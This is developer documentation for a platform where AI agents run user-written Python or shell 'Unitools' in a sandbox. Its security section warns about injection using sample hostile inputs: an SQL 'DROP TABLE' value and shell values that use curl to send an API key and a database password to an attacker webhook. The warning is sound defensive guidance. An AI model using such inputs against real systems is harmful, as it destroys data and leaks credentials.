
How it works
When you create a Unitool, you define:- Input fields
Parameters the AI agent collects from the conversation - Code
Python or Shell script that processes the inputs - Secrets
Environment variables for credentials (API keys, database URLs)
- Extracts the required field values from the conversation context
- Executes your code in an isolated sandbox
- Returns the result to continue the conversation

Runtimes
handle(fields) function that receives input values and returns a result. Use print() for debugging-output appears in the Logs tab.
Shell scripts receive inputs via the field command. Write your result to $OUTPUT. The complete input JSON is available in $INPUT.
Pre-installed Python packages
You can install additional Python packages using
uv (uv pip install <package>), but this increases runtime latency since packages are installed on every execution.Shell tools
Shell scripts run inbash with the following CLI tools available: curl, jq, python, and uv.
Execution environment
Your code runs in an isolated Linux VM. Each execution gets a fresh environment-installed packages don’t persist between runs.Machine specifications are subject to change as we optimize the platform.
Input fields
Fields define the parameters your Unitool accepts. The AI agent automatically extracts these values from the conversation.Field types
Required vs optional
Mark fields as required when the Unitool can’t function without them. Optional fields have sensible defaults in your code:Secrets
Store sensitive credentials as secrets rather than hardcoding them. Secrets are:- Encrypted at rest
- Injected as environment variables at runtime
- Never exposed in logs or results
Security
“With great power comes great responsibility.”Unitools give you the ability to execute arbitrary code that connects to your databases, APIs, and external services. Security is a shared responsibility between botBrains and you.
What botBrains ensures
We provide infrastructure-level isolation to protect you and other customers. Your code runs in a dedicated sandbox that can’t access other customers’ environments or data. Every execution starts with a fresh VM-no state, files, or processes persist between runs. The sandbox has no access to botBrains internal systems or cloud metadata endpoints; your code can only reach the public internet.Your responsibilities
You are responsible for the security of the code you write. Common risks include:Writing secure code
The isolated sandbox protects botBrains and other customers-but injection vulnerabilities in your code put your own systems at risk. Attackers could steal your credentials, exfiltrate data from your databases, or escalate privileges on your external systems. Secret leaks. Never log or return sensitive values:order_id like '; DROP TABLE orders; -- could delete your data.
"; curl -X POST -d "$API_KEY" https://webhook.site/attacker-id # could exfiltrate your secrets to an attacker-controlled server.
x]"; curl -d "$DB_PASSWORD" https://webhook.site/attacker-id # could steal credentials.
Prohibited activities
botBrains may suspend your access at any time. The following activities will get you suspended.Templates & Use Cases

Starting from a draft is much easier than from a blank piece of paper.Templates are drafts of common use cases that you can customize as needed. You can also use AI-suggested Unitools to create and edit existing Unitools faster.
Database lookup
Query your PostgreSQL, MySQL, MongoDB, or redis databases:API integration
Call external APIs and return processed data:Webhook trigger
Send data to automation platforms like n8n or Zapier:Web scraping
Extract real-time data from websites:Best practices
-
Keep it focused
Each Unitool should do one thing well. Create separate Unitools for different operations rather than one complex script. - Handle errors well Return meaningful error messages the AI agent can relay to users:
- Minimize latency
Users are waiting. Avoid installing packages at runtime, keep API calls efficient, and use connection pooling for databases. - Limit output size
The system truncates results over 200 KB. Return only the data the AI agent needs, not entire database tables.